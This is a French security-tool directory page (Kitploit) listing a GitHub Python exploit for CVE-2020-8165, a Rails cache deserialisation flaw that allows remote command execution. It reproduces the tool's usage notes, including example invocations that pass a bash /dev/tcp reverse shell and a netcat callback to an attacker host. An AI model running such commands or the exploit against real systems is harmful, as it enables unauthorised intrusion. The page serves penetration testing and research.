Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-8165 — Exploit Python pour CVE-2020-8165 ciblant Rails MemCacheStore et RedisCacheStore. Permet l'exécution de commandes à distance via le démarshalage d'objets fournis par l'utilisateur avec une interface basée sur argparse. | Kitploit
Outils/GitHubGitHub/hybryx/cve-2020-8165
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubhybryx/cve-2020-8165

CVE-2020-8165

Exploit Python pour CVE-2020-8165 ciblant Rails MemCacheStore et RedisCacheStore. Permet l'exécution de commandes à distance via le démarshalage d'objets fournis par l'utilisateur avec une interface basée sur argparse.

Voir le dépôt
42il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-8165 Python Exploit

Ce code permet d'exploiter CVE-2020-8165 avec Python3. Cet exploit fonctionne avec rails < 5.2.4.3, rails < 6.0.3.1. L'exploit permet à un attaquant de désérialiser des objets fournis par l'utilisateur dans MemCacheStore et RedisCacheStore. Ce code d'exploitation utilise ArgParse pour permettre à l'utilisateur d'exploiter très simplement cette vulnérabilité.

Usage

Il y a cinq arguments pour cet exploit :

  • rHost - L'adresse IP de l'hôte distant (cible)
  • rPort - Le numéro de port de l'hôte distant (cible) sur lequel Rails est en cours d'exécution
  • email - L'email utilisé pour se connecter au service
  • password - Le mot de passe du compte pour se connecter au service
  • cmd - La commande à exécuter, entre guillemets pour tenir compte des espaces

Exemples :

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

Crédits principaux

Détails originaux de la CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Code d'exploitation Pastebin que j'ai retouché et auquel j'ai ajouté ArgParse : https://pastebin.com/jpHpdBTk

Télécharger l’outil